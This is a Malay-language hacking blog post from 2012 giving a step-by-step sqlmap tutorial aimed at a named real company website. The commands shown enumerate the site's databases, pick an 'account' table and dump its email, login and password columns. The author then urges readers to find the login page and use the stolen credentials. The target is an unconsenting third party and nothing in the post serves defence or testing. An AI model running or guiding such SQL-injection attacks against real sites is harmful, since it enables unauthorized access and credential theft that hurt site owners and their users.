Monday, 9 July 2012

sql map tutorial by dotmy crew

Posted by Malaya Hackers at 18:51

SQLMAP FORM DotMy Crew...

 

 


 Assalamualaikum semue. hari nie nak buat tutor sal sqlmap


Ok jom start

Sblom tue, barang2 yang perlu korang ade



1-Download Python 2.7 ( http://www.python.org/ftp/python/2.7.2/python-2.7.2.msi )



2-Download Sqlmap ( http://sqlmap.sourceforge.net/ )



3-CMD (same jea dgn command prompt)



4-vuln website



ok mule2 pgy ke local disk c. Buat satu folder dan namakannya sqlmap



Sekarang extract file sqlmap yang kite da download tady ke dalam folder sqlmap

Ok set.



Sekarang buka cmd

untuk kali nie saye akan menggunakan vuln website berupa nie http://www.mmbuildings.com/newsitem.php?id=61



Ok skarang di cmd buka dan type

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61



ok skarang kalau mengikut website yang saye pilih tady akan kluar due option iaitu Y/N

ok type N

skarang sqlmap akn shutdown



Type nie pula

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 --dbs

kalau anda ikut step by step anda sepatutnya akan dapat database

Database yang saye dapat berupa

*mm_mm

*information_schema <-------yang nie kite ta nak

Jadi kite akan pilih mm_mm <------comel la plak...hehe

Macamne kite na pilih??

Type nie c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm --tables

Tgu dy scan jap <-----boleh minum kopi ntuk mengelakkan rase bosan



Skarang kite akan nampak tables

Jadi skarang saye akan pilih tables account (ingat setiap website mempunyai tables yang berlainan)

Type dalam cmd

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --columns

Yes. Sekarang dah nampak 3 columns iaitu email id login access dan password! :D



Jadi saye akan ambil ke 3 3 nye (WOOHOO)

Type nie plak

c:\sqlmap\sqlmap.py -u http://www.mmbuildings.com/newsitem.php?id=61 -D mm_mm -T account --dump

Wow! ade email n pass n id







Pastue nak buatpe?? Pk2 la sdry (cary la login page n Enjoy!)



Saye mgambil mase yang lame menulis tutor ini jadi kalau nak gne jgn lpe credit kpade saye !





Originally by .:: Prince Kira Shc ::.
Juragan ZrenZ

saya sayang fizz sempoi dan avenged sevenfold wakakkakaka
tq

25 July 2012 at 14:25

1 comments:

Subscribe to: Post Comments (Atom)
 
Malaysian Blackh4t | Copyright © 2012 | Designer Template by Fizz | MachoCyberSec & Malaysian Blogger™ & edited by : My-Blackh4t Community